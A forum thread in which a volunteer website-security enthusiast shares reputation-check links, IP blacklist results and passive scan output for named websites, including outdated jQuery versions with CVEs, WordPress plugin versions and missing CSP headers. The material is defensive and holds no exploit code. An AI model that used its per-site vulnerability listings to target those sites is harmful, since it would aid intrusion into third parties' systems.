Post by: polonus on June 13, 2022, 12:26:49 AM
Tracking information -
Re: https://confection.io/trackers/eu-eb2-3lift-com/
Re: https://www.joesandbox.com/analysis/257195/0/html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 18, 2022, 06:07:17 PM
And again we have lost some fine initiative for checking on Bad IPs at -https://ip-46.com/feeds
as that service was discontinued quite recently, a site where I personally reported many a bad IP feed.

We still have this (random example): https://www.abuseipdb.com/check/82.174.251.216
and various other resources, but we have lost quite some valuable evaluation resources over time,
also because these resources came under continuous attack from malcreants-cybercriminals
or they did not get the support to pay for the "wires" and server-service. A pity really.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 18, 2022, 09:45:18 PM
Here we will take scan results from three different scan sources.

On the malcode detection of Remcos RAT: https://urlhaus.abuse.ch/url/2243687/

Then the according VT report: https://www.virustotal.com/gui/url/6f4bf2ffc13b812ff7cc353c8e6d310c038e9ea2fc38ce026d9807e3363df782
with three av-vendors flag this malcode.

This website loads trackers on your computer that are designed to evade third-party cookie blockers.
Canvas fingerprinting was detected on this website. This technique is designed to identify users even if they block third-party cookies. It can be used to track users' behavior across sites. This technique was used by six percent of popular sites when we scanned them in September 2020.

Blacklight detected a script loaded from filebin.net doing this on this site.

It secretly draws the following image on your browser when you visit this website for the purpose of identifying your device.

However...https://themarkup.org/blacklight?url=filebin.net ->
While Blacklight accurately detects the presence of canvas fingerprinting on a website, it cannot determine if the purpose is user behavior monitoring or for fraud prevention or bot detection.

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 18, 2022, 10:17:12 PM
Another pair to combine: https://www.projecthoneypot.org/list_of_ips.php

Re: https://www.abuseipdb.com/check/46.101.210.101
and
https://maltiverse.com/ip/46.101.210.81

Given with associated harvesters: https://www.projecthoneypot.org/ip_46.101.210.101

proxy also listed here: https://www.freeproxy.world/?type=socks4

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 19, 2022, 04:38:59 PM
Blacklisted and 8 vendors flag:
https://urlhaus.abuse.ch/url/2244605/
See: https://whatismyip.live/blacklist-check
Blacklist Status for your IP: 42.239.97.158
Blacklist   Description   Status
dnsbl.spfbl.net   DNSBL SPFBL List   Listed
red.uribl.com   URIBL red   Listed
grey.uribl.com   URIBL grey   Listed
black.uribl.com   URIBL black   Listed
multi.uribl.com   URIBL multi   Listed
-> https://www.virustotal.com/gui/url/ecf4af28e2e9081ecbf2699669cdcd4c99230ac83576d52f096a81ccf918dc6a/community

Abuse on China's backbone (general information)  https://www.shodan.io/host/42.239.97.158

Top Hacker: https://community.sophos.com/utm-firewall/f/network-protection-firewall-nat-qos-ips/39664/top-hacker-hn-kd-ny-adsl

and how he plays a roll in China's attempts to block tor (scanning for tor bridges) and other abuse:
https://dontai.com/wp/2016/06/08/hn-kd-ny-adsl-research-ban/

Completely missed here: https://blacklistchecker.com/check?input=42.239.97.158
Flagged here: https://www.blacklistmaster.com/check?t=42.239.97.158  (given on 3 lists).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 21, 2022, 10:32:24 PM
See how Google Chrome makes user tracking through installed extensions possible.

This can be achieved via web-accessible-resources.
Secret tokens of extensions cannot hide from a specific timing method to their existence being revealed,
the more extensions installed the more precise and unique your user borwser fingerprint will be.

https://developer.chrome.com/docs/extensions/mv3/manifest/web_accessible_resources/

Firefox browser is not vulnerable to this sort of user tracking.

Scan here: https://z0ccc.github.io/extension-fingerprints/

Test here: https://coveryourtracks.eff.org/kcarter?aat=1   (for other browser-tracking methods)
Most characteristics are derived via JavaScript, a decent script blocker of sorts is a must nowadays,
as most monoculture browsers come as user tracking tools par excellence.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 29, 2022, 06:42:26 PM
Verification of IP: https://greensnow.co/statistics
and https://greensnow.co/view/46.161.27.204#listeAttaques

see also: https://www.abuseipdb.com/check/46.161.27.204

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 03, 2022, 06:36:00 PM
Other fine resources to check suspicious IP against:
https://cleantalk.org/blacklists/23.133.8.3  (random tor-address example given)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 08, 2022, 08:13:33 PM
Observed activity, but only one vendor to flag ....
Re: https://viz.greynoise.io/ip/223.205.232.52
On IP address: https://db-ip.com/223.205.232.52
1 security vendor flags it: https://www.virustotal.com/gui/ip-address/223.205.232.52/detection
Nothing here while there is vulnerable & abusable smbv1 there:
https://cleantalk.org/blacklists/223.205.232.52

pol
Title: Re: Tests and other Media topics
Post by: polonus on July 09, 2022, 02:27:21 PM
Checking for a Magento webshop site (random example):
(cold recon 2rd party scan results): https://www.magereport.com/scan/?s=https%3A%2F%2Fwww.tdcautomotive.com%2F
& https://webscan.foregenix.com/webscan_results.html?scanid=15f45d6b_1348_41e2_8375_ca2101279684&type=2&emailaddress=
& https://magentary.com/magento-security-patch-tester/
SSL checker results
Quote
Resolves to   -www.tdcautomotive.com
Expiration date   Jun 17, 2023
Vendor signed   No
Hostname   Doesn't Match
Key length   2048
Server type   NA
Common name   -tdcautomotive.com
SAN   -tdcautomotive.com, -www.tdcautomotive.com
Organization   Starfield Technologies, Inc.
Common name   Starfield Secure Certificate Authority - G2 Starfield Secure Certificate Authority - G2
Serial number   a4:36:46:d1:88:8f:65:d7
Signature algorithm   sha256WithRSAEncryption
Fingerprint (SHA-1)   C4DD2404FFA414580125E5A6DD936D4854750A13
Fingerprint (MD5)   C7DECE69DB4AEE913298BBDA0C40BC48

Retire.js results:
Quote
jquery   1.12.4   Found in
-https://www.tdcautomotive.com/pub/static/frontend/Smartwave/porto/en_GB/jquery.js _____Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   
Medium   CVE-2020-11022 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   
Medium   CVE-2020-11023 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   
knockout   3.4.2   Found in
htxps://www.tdcautomotive.com/pub/static/frontend/Smartwave/porto/en_GB/knockoutjs/knockout.js _____Vulnerability info:
Medium   XSS injection point in attr name binding for browser IE7 and older
NO CSP POLICIES FOUND.
Vulnerabilities
Another scan delivers - low risk established
https://www.magereport.com/scan/?s=https%3A%2F%2Fros.your-printq.com%2F

But vulnerabilities detected on the server behind that website:, given here: https://www.shodan.io/host/185.137.171.10

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 09, 2022, 11:24:06 PM
Scanning strating from a suspicious or insecure IP address:
https://www.projecthoneypot.org/ip_185.199.159.155
https://www.shodan.io/host/185.199.159.155
Nothing detected here: https://check.trendmicro.com/page/QuickStart?s=agrdy.com
Error and insecure connection (unsafe): http://185-199-159-155.xyz.agrdy.com/
VT somehow cannot resolve address (down?): https://www.virustotal.com/gui/url/3d7aadb8d64a2efc5938be4c206c68a28bc177bf1fbb32d799aa3fde73669b63?nocache=1
Re: https://intelx.io/?did=0906af8d-ea43-4d29-8582-0a8ad20deee4
See: https://sitecheck.sucuri.net/results/www.agentsuccesslab.com  (error).
Went full round: https://db-ip.com/137.175.69.54

Have a nice new week,

pol
Title: Re: Tests and other Media topics
Post by: DavidR on July 10, 2022, 12:35:12 AM
Hi Pol,

Want to take a look at this one - https://forum.avast.com/index.php?topic=320277.0 - a bit weird youtube playlists causing avast to alert.
Title: Re: Tests and other Media topics
Post by: polonus on July 10, 2022, 12:43:56 PM
Hi DavidR,

I did so in that thread, please read there.

Nice resources to give back to this community, that also found up on such CDNs as inherited,
like -> https://domain.op[/left]endns.com/yt3.ggpht.com

DNS services, that is to say sometimes vital and sometimes rather questionable services.

Have a nice Sunday,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 10, 2022, 04:55:11 PM
Check dns for being blacklisted: https://www.dnsbl.info/
This domain is now for sale:
Re: https://www.dnsblacklist.org/?domain=dul.ru
Quote

-dul.ru
31.177.80.70
Russia

Result
Not blocked anywhere.

Check spam IPs here: https://glockapps.com/blacklist/all-s5h-net/

pol
Title: Re: Tests and other Media topics
Post by: DavidR on July 10, 2022, 05:26:51 PM
Hi DavidR,

I did so in that thread, please read there.
<snip>

Have a nice Sunday,

polonus

I have seen it thanks.

Great Sunday here hot as hades right now, watching Wimbledon men's singles final right now.  I hope you are enjoying the good weather also.

It was pretty hot on my morning exercise too, I was out just before 12PM, sweating buckets.
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2022, 07:17:49 PM
Additionally to this being checked here: https://www.dnsblacklist.org/?domain=dul.ru
Re: https://github.com/NethServer/dns-community-blacklist/blob/master/adguarddns.dns
Compare results ->
Flagged but not being blocked according to what results we got here:
https://www.dnsblacklist.org/?domain=advantageglobalmarketing.com
blocked inside browsers with adblockers because of Easylist blocking: because of filter
-||advantageglobalmarketing dot com^

Quote
We will test your domain name against 17 of the most popular public DNS resolvers available.

AdGuard
CleanBrowing
CloudFlare 1.1.1.1
CloudFlare 1.1.1.3 (Family Filter)
Norton ConnectSafe
Google 8.8.8.8
OpenDNS Family
Quad9
Yandex DNS
Comodo Secure DNS

Check page for DNS via IP: https://matrix.spfbl.net/en/134.209.188.55

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 25, 2022, 05:26:35 PM
All attack samples given here: https://www.thegeekstuff.com/2012/02/xss-attack-examples/
were detected by Malware Script Detector v. 02b run in Tampermonkey extension.
Given in as a Yahoo query this script 'barked' and blocked access.
Example of such a query blocked:
Quote
htxps://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.md
semgrep.dev./s/we30
hxtps://itigic.com/find-xss-vulnerabilities-with-findom-xss-scanner/

Console messages: Mixed Content: The page at 'httxs://www.threeworldwars.com/world-war-3/ww3.htm' was loaded over a secure connection, but contains a form that targets an insecure endpoint 'htxp://www.google.com/custom'. This endpoint should be made available over a secure connection.
-ww3.htm:1 Mixed Content: The page at 'htxps://www.threeworldwars.com/world-war-3/ww3.htm' was loaded over HTTPS, but requested an insecure script 'hxtp://www.google-analytics.com/urchin.js'. This request has been blocked; the content must be served over HTTPS.
-ww3.htm:647 Uncaught ReferenceError: urchinTracker is not defined
    at -ww3.htm:647
-ww3.htm:650 A parser-blocking, cross site (i.e. different eTLD+1) script, -htxps://ssl.google-analytics.com/ga.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See
-htxps://www.ch40mestatus.qjz9zk/feature/5718547946799104 for more details.
(anonymous) @ -ww3.htm:650
-ww3.htm:650 A parser-blocking, cross site (i.e. different eTLD+1) script, -https://ssl.google-analytics.com/ga.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See htxps://www.ch40mestatus.qjz9zk/feature/5718547946799104 for more details.
(anonymous) @ ww3.htm:650
-ga.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-adsbygoogle.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-connect.facebook.net/en_US/all.js#xfbml=1:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-e8af8301-45e2-41c6-9212-9421ce1b1dc7.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-sp.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-onLoadModule.js:72 ...Selector Finder is running...
VM51:1 Uncaught ReferenceError: popWin is not defined
    at <anonymous>:1:1
3rd party cookie issues: Mixed content: load all resources via HTTPS to improve the security of your site

Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-adsbygoogle.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-connect.facebook.net/en_US/all.js#xfbml=1:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-e8af8301-45e2-41c6-9212-9421ce1b1dc7.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-sp.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-onLoadModule.js:72 ...Selector Finder is running...
VM51:1 Uncaught ReferenceError: popWin is not defined
    at <anonymous>:1:1
Enjoy,

polonus (- and x added in quote by me for obvious reason)
Title: Re: Tests and other Media topics
Post by: polonus on July 26, 2022, 11:35:05 PM
Next through avast protect your privacy against mass surveillance and total control measures:
-> privacytools.io

When not strictly obligatory do not enter personal identifiable data, when you can avoid it,
use an alias in stead. Do not share data online, that you would not already share with all of the globe,
because that is where all data goes on Interwebz.

Always keep this reasoning at the back of your heads, folks.
Once bitten, twice shy, and do'nt take coal to Newcastle (...they already have plenty of that there)  :D .

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 10, 2022, 10:22:45 PM
Check on tracking and for insecure tracking methods here:
https://reports.exodus-privacy.eu.org/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 23, 2022, 01:10:02 PM
It is advisable to check on Android though the Virus Total app for example all app permissions you granted.

What permissions to avoid?

See:  HTTPS://www.online-tech-tips.com/smartphones/30-app-permissions-to-avoid-on-android/
Source Guy McDowell

polonus



Title: Re: Tests and other Media topics
Post by: bob3160 on August 23, 2022, 02:42:39 PM
The correct link is:
https://www.online-tech-tips.com/smartphones/30-app-permissions-to-avoid-on-android/
Title: Re: Tests and other Media topics
Post by: polonus on September 02, 2022, 12:05:40 AM
Test security of your website here: https://en.internet.nl

polonus
Title: Re: Tests and other Media topicsO
Post by: polonus on September 17, 2022, 04:49:34 PM
One can perform a quick and dirty word press security scan for a website with WordPress CMS here: https://hackertarget.com/wordpress-security-scan/

Mind that the Word Press CMS version update comes faster than given there.

Scanned a random WP site there: -https://ufoholic.com/

Found following issues:
Quote
The following plugins were detected by reading the HTML source of the WordPress sites front page.

Plugin   Update Status   About
popup-builder 4.1.9   Warning   latest release (4.1.13)
https://popup-builder.com
ultimate-social-media-icons 2.7.5   Warning   latest release (2.7.7)
http://ultimatelysocial.com
Plugins are a source of many security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers plugin page for information about security related updates and fixes.

There are likely more plugins installed than those listed here as the detection method used here is passive. While these results give an indication of the status of plugin updates, a more comprehensive assessment should be undertaken by brute forcing the plugin paths  using a dedicated tool.

Linked sites given the all green as well as JS links.
Quote
File not found for me because blocked: File not found: hxtps://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-8450070672787649

Retirable code found up with retire.js
Quote
jquery-ui   1.13.1   Found in hxtps://ufoholic.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1 _____Vulnerability info:
Medium   CVE-2022-31160 XSS when refreshing a checkboxradio with an HTML-like initial text label   

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 20, 2022, 03:39:19 PM
For those developers into javascript security.

Different findings from retire.js and otto.js extensions inside a chromium browser.

Both extensions  are developers hlping tools:
Retire.js alerts retirable js libraries (outdated & vulnerable).
Otto.js extension checks on the visiting webpage for security issues like Tracking scripts, Data Stealing, Malware and Weak site security, it will also alert for vulnerable javascript as retire.js does.

Otto.js for this avast forum website alerts for a tracking script by kslogs.ru.

Although Google gives it the all green (pretty safe), webrate frowns upon it:
https://webrate.org/site/kslogs.ru/

Also see: -> https://www.virustotal.com/gui/url/66c6ed4e40e622a8c6ca05ada7e2cf2a46d86eb54877bf1eed925964ad40627c/details

Erlend Oftedal's retire.js has no alerts whatsoever for this here webforum site.

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)


Title: Re: Tests and other Media topics
Post by: polonus on September 25, 2022, 03:03:40 PM
Went over to VirusTotal to check on an alleged DOS-attack undertaken from -js.stripe.com via -m.stripe.network on the -www.unz.com website.

A rescan for the finalizing scan results was only available for privileged users,
so I launched an anonymous  search here:
 https://packettotal.com/app/analysis?id=57809fff9e90ae7dc08403185cd44569&name=conn  (https://packettotal.com/app/analysis?id=57809fff9e90ae7dc08403185cd44569&name=conn)

What came us there were all Wireshark packed scans (connection and others)

Packettotal, quite nice resources,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 28, 2022, 03:56:46 PM
Scan tools resources being worked around here: https://www.dshield.org/tools/

pol
Title: Re: Tests and other Media topics
Post by: DavidR on September 28, 2022, 04:17:34 PM
Scan tools resources being worked around here: https://www.dshield.org/tools/

pol

Bookmarked, thanks.
Title: Re: Tests and other Media topics
Post by: polonus on September 28, 2022, 04:46:13 PM
Example: https://www.dshield.org/tools/dnslookup.html

Interesting in the light of this news: https://www.quad9.net/news/blog/an-update-to-the-quad9-and-sony-music-german-court-injunction-august-2022/

And these recommendations: https://bgr.com/guides/the-best-free-and-public-dns-servers-in-2022/

Issues like no security support for non-business users and/or no ad-blocking at Cloudflare's for instance could be serious considerations what DNS to choose. On windows one could use DNS Jumper v2 to change one's DNS on the fly.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2022, 02:30:52 PM
TLS Checker with instant results to be found here: https://www.cdn77.com/tls-test

Moderate version 1.2. found to reside here: https://www.cdn77.com/tls-test/result?domain=forum.avast.com

Check also with otto for Chrome: no Tracking Scripts, no Data Stealing, no Malware, no Weak Security.

Also has a CSP designer on board, example:
Quote
default-src 'self' ; worker-src 'self' blob: ; script-src 'self' 'unsafe-eval' 'unsafe-inline'

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 02, 2022, 02:07:55 PM
Website scan sites to check on a potential phish:

https://easydmarc.com/tools/phishing-url   &   https://checkphishing.com/

In this case 5 vendors at VT also flag this as a PHISH:
https://www.virustotal.com/gui/url/a84de0bf2fb6d844449b6d785597b2cf5b28c178021632ba34b5e50df5e5f25f

while that website's IP is only being flagged by one instance here:
https://www.virustotal.com/gui/ip-address/155.94.143.206

while here all instances were given:
https://www.virustotal.com/gui/ip-address/155.94.143.206/relations

So we will look for ASN-QUADRANET-GLOBAL abuse at URLHAUS, cleantalk.org, ip.lookup.org.
VPN/TOR/Proxy: Likely (and also abuse) 4% online malware
-> https://www.ip-lookup.org/location/155.94.143.206/

polonus


Title: Re: Tests and other Media topics
Post by: polonus on October 21, 2022, 11:34:31 AM
You are being tracked inside your browser all over the Internet.
Do not feed data that you do not want to share with the world and land on all sort of desks.

Who is tracking you - a extension to see what goes on is the "Who is tracking me"-extension

Reporting here for instance on a website for a big national Dutch newspaper
38 instances of GStatics tracking, -googleapis.com and -privacy-centre.org

Disconnect extension only flags 3. Brave shield blocks 2,

We found one unhandled javascript error
Quote
Unhandled JavaScript Error
at window.console.error (<anonymous>:1:649) at hxtps://www.telegraaf.nl/:17:23 at patchedCallback (<anonymous>:132:45)
Error at 17:23 of hxtps://www.telegraaf.nl/


polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 26, 2022, 01:09:12 PM
All chromium-based browser may leak your local IP.

Test here: https://niespodd.github.io/webrtc-local-ip-leak/

Then this WebRTC Control extension will prevent leakage:
https://chrome.google.com/webstore/detail/webrtc-control/fjkmabmdepjfammlpliljpnbhleegehm

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 26, 2022, 03:39:40 PM
Where the threat was being reported: https://urlhaus.abuse.ch/url/2385725/

Where it was detected as not to be scanned: https://sitecheck.sucuri.net/results/warukraine.co/un/nsittes

Where the IP address was being scanned by Threat Analysis: https://jamesbrine.com.au/213.229.66.214/

Flagged as suspicious by one vendor here: https://www.virustotal.com/gui/url/749739209e87e4fda855f3a47713d1f4317a74ea44bdae86c6e8199bd4adcb7b
Categorized as compromised website - https://www.virustotal.com/gui/url/749739209e87e4fda855f3a47713d1f4317a74ea44bdae86c6e8199bd4adcb7b/details

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 10, 2022, 03:11:27 PM
IP blacklist checking for a server address used by MBAM:
https://www.ip-tracker.org/blacklist-check.php?ip=Sirius.mwbsys.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 17, 2022, 12:38:31 PM
Tested my adblocking in the latest beta version of the Avast Secure Browser.

Likely you would like to test also, then go here: https://adblock-tester.com/
(made by matuhin dot ru) (P.S. your English seems fine to me).

Enjoy my friends,

By the way, I had the full 100 points out of 100:
Quote
This is the most common form of advertising and tracking on the internet. It’s very easy for website owners to set up. These services collect data about you in order to find the right advertisement for you.

close
Script loading:  ✅ test passed
Block visibility:  ✅ test passed
close
Script loading:  ✅ test passed
Block visibility:  ✅ test passed
close
Script loading:  ✅ test passed
Block visibility:  ✅ test passed
medium
close
These services monitor your actions on the site and collect information about you. They are needed only by the owner of the site, for the user it is only unnecessary requests and the code that needs to be executed. Unfortunately, blocking them sometimes can completely break the site.

close
Script loading:  ✅ test passed
Script execution:  ✅ test passed
close
Script loading:  ✅ test passed
Script execution:  ✅ test passed
low
close
This type of advertising is often used on large websites that sell ad space. It is difficult to block because it is difficult to distinguish between an advertising image and a regular image. Often the rules are written for each site separately, so this check is not entirely accurate. It only checks for the presence of keywords in the file path and the availability of Flash.

close
File loading:  ✅ test passed
Block visibility:  ✅ test passed
close
File loading:  ✅ test passed
Block visibility:  ✅ test passed
close
File loading:  ✅ test passed
Block visibility:  ✅ test passed
low
close
Unlike analytics tools, these services are used to track and measure errors on websites. Services monitor almost all user actions so that the error message is as complete as possible. Most often, if you turn these off, nothing will break.

close
Script loading:  🏳️ unable to check (possibly due to service security settings)
Script execution:  ✅ test passed
close
Script loading:  ✅ test passed
Script execution:  ✅ test passed
100 points out of 100
(10 services, 20 cheks)

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 17, 2022, 01:37:41 PM
PrivacyGuides.org
The guide to restoring your online privacy

https://www.privacyguides.org

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 29, 2022, 10:27:53 PM
Various scanners to scan scam websites

urlscan.io
www.emailveritas.com   
www.scamvoid.net
www.scam-detector.com 
www.scamaider.com

for tracking apps:  reports.exodus-privacy.eu.org   

website scanner:
ionos.com/tools/website-checker     
sitecheck.sucuri.net

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 14, 2022, 01:10:54 PM
In the light of all the data breaches on websites and recent SSL vulnerabilities through heap overflow (fortinet's etc.) it is advisable to do a thorough SSL Server Test, like:
https://www.ssllabs.com/ssltest/analyze.html?d=fortinet.com  (also check with  certview there).

At SSLBL.abuse.ch for detecting malicious SSL Threats, at www.zscaler.com

SSL Certificate Chain analysis at vulners.com Using the SSL Checker at www.sslshopper.com

Online SSL Scan at hackertarget.com  &  SSL Scanner report at www.ssltools.com

Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 17, 2022, 10:26:38 AM
Why so many websites lack a decent CSP policy?

Like these here forums. F-grade: Result
CSP Protection
None
CSP Reporting
Missing
CSP Validity
Invalid
XSS
No CSP Protection
Clickjacking
No CSP Protection
Formjacking
No CSP Protection
General
No CSP Protection

You could argue, they just provide plain content, so they do not need CSP,
but what in view of all the forum-spam to be cleansed?

Just check your CSP scanner extension, it is always penny wise and pound foolish policies.

Also use this: https://csp-evaluator.withgoogle.com/
Check with: https://cspvalidator.org/#url=https://forum.avast.com

No CSP policies in headers or meta elements found at -https://forum.avast.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 26, 2022, 01:12:52 PM
The information gained here could also be important in combination with a website security scan,
for instance via nibbler: https://nibbler.insites.com/en_US/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 22, 2023, 01:17:57 PM
With Let's Encrypt we will basically have to trust DNS.

Check DNS with Nir Sofer's tool: DNSDataView (combined with his tool IPNetinfo).

Online check with: DNSSec Analyzer dnssec-debugger.verisignlabs.com
and re-check with DNSViz at dnsviz.net

(Mind you that at dnsviz.net you will also communicate with twitter,
lest you haven't blocked that with NoScript for example)
Check for twitter searching nitter.eu or nitter.it).

Important to check DNS, because certain Android-malware may change DNS-settings.

Be vigilant,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 07, 2023, 10:39:09 PM
Do a website scan with Snyk, and take a glance over the Web Page Test details,
a random example with the waterfall results, you can find it here:

https://www.webpagetest.org/result/230207_BiDcQ5_JAR/1/details/#waterfall_view_step1

You probably also experience what my browser had blocked (ad-blocker and tracking blocks).

Enjoy, my good friends, enjoy,

pol
Title: Re: Tests and other Media topics
Post by: polonus on February 08, 2023, 06:16:27 PM
Marked malicious parked domain (9 vendors flag):

Website scan: https://urlscan.io/result/a89defce-9340-4fc5-a782-6ad9e958acb0/

Snyk vulnerability test scan results:
https://snyk.io/test/website-scanner/?test=230208_AiDc17_DJP&utm_medium=referral&utm_source=webpagetest&utm_campaign=website-scanner

Connection viewer etc.:
https://www.webpagetest.org/result/230208_AiDc17_DJP/1/details/#waterfall_view_step1

VT results - manyfold flagged as malicious website:
https://www.virustotal.com/gui/url/93117aef5b2e4a3ca73fcbb03ad5f095f3452b4d04be5095f3588f5488751efc/details

On IP: https://www.abuseipdb.com/check/199.59.242.153

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 10, 2023, 10:57:01 PM
Various Spam IP scans:

https://www.abuseipdb.com/check/45.134.225.229

https://scamalytics.com/ip/45.134.225.229

https://cleantalk.org/blacklists/45.134.225.20

Verdict: spam and fraud.

pol
Title: Re: Tests and other Media topics
Post by: polonus on February 11, 2023, 12:29:33 PM
Server - RPKI Route Authorisation established:
https://en.internet.nl/site/server-99-84-160-58.ord52.r.cloudfront.net/1922370/

Giving an error here: https://sitereport.netcraft.com/?url=https://server-99-84-160-58.ord52.r.cloudfront.net

1 detected file: https://www.virustotal.com/gui/ip-address/99.84.160.58

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 12, 2023, 01:45:59 PM
Checked my desktop connections with Free Monitor and found connections with:
https://www.abuseipdb.com/check/13.107.42.16

One vendor to flag at VT's:
https://www.virustotal.com/gui/ip-address/13.107.42.16/detection

This before my browser even opened.

pol
Title: Re: Tests and other Media topics
Post by: polonus on February 13, 2023, 12:12:39 PM
I check my connections with a monitoring tool on Windows 11.

Re: https://scamalytics.com/ip/172.67.216.181  Fraud score: 38
Zero risk here with AKAMAI: https://scamalytics.com/ip/95.101.74.197 

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 16, 2023, 01:05:13 PM
Check your android apps tracking and permission score here:
https://exodus-privacy.eu.org/en/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 25, 2023, 04:27:03 PM
As trust is being written in ever diminishing letters everywhere,
scan your unknown to you websites here:

Random scan example: https://trustscam.nl/sgvps.net

Another one: https://www.ssltrust.com/ssl-tools/website-security-check?domain=torry.io

And of cource you have Avast Online Security & Privacy extension in the browser on board.  ;)

Enjoy, my friends, enjoy,

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 26, 2023, 05:27:08 PM
Internet Outings: https://www.thousandeyes.com/outages/

When I write this outings in Tokyo, Singapore and China.

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 11, 2023, 02:19:59 PM
Website Tracking Scan -> https://themarkup.org/blacklight?url=

and https://cookie-scanner.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 12, 2023, 05:44:15 PM
Almost all adblockers will flag and block this link, but is not flagged at VT etc.

See: https://urlscan.io/result/4de5236a-9e1e-4499-afd4-66ea6463e278/

See also indicators thereof: https://urlscan.io/result/4de5236a-9e1e-4499-afd4-66ea6463e278/#indicators

Experience here that adblockers are among the most popular add-ons:
https://addons.mozilla.org/en-GB/firefox/search/?promoted=recommended&sort=users&type=extension

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 13, 2023, 06:15:38 PM
Checking PHISHING domains against a scanner:

Where known phishing domains were being listed: https://openphish.com/

One of them checked: https://www.isitphish.com/  -http://simulatedareas.com/
Given as safe:
73.4% Legitimate
26.6% Phishing

For all cases your Avast Online Security & Privacy protection does a far better job, and stops them.

Another check site with random example: https://www.ipqualityscore.com/threat-feeds/malicious-url-scanner/https%3A%2F%2Fapp.simplenote.com%2Fpublish%2FXhRdVc

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 17, 2023, 02:25:45 PM
Checking on open phish domains:
Re: https://urlscan.io/result/8a99e7e5-fe6e-4b34-a6f1-826b8093f057/dom/
and  blacklisted: https://sitecheck.sucuri.net/results/https/bigappboi.com/cl/i/qk4l8w
Abuse on Amazon: https://www.abuseipdb.com/whois/23.22.126.183
Adblocked, see: https://urlscan.io/result/8a99e7e5-fe6e-4b34-a6f1-826b8093f057/#indicators

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 20, 2023, 03:45:13 PM
Be aware of maliicous IP -> https://www.criminalip.io/en/asset
Either critical or dangerous IP.

Also compare results (random IP example):
https://www.projecthoneypot.org/ip_191.102.153.111

then https://maltiverse.com/ip/191.102.153.111

https://www.virustotal.com/gui/url/81b11697fd251b1b1b4d9ef4583de0f4dd1a08d63386866b930e2d136d260987/details

and here: https://www.malwareworld.com/
Quote
Malicious: true for 35.146.254.16
Type: BadReputation
Location: Lat(37.87085623213167) - Long(-97.78518256324038)
References:
    https://www.maxmind.com/en/high-risk-ip-sample-list
    https://raw.githubusercontent.com/stamparm/ipsum/master/ipsum.txt

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 26, 2023, 06:21:21 PM
Website access scanner: (random example)

https://accessify.com/t/torry.io
&
https://www.accessify.com/d/search.disconnect.me

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 21, 2023, 04:48:28 PM
Evaluating: https://urlscan.io/result/cbeb3a97-46f1-40e1-ac29-1282dee7f249/#indicators
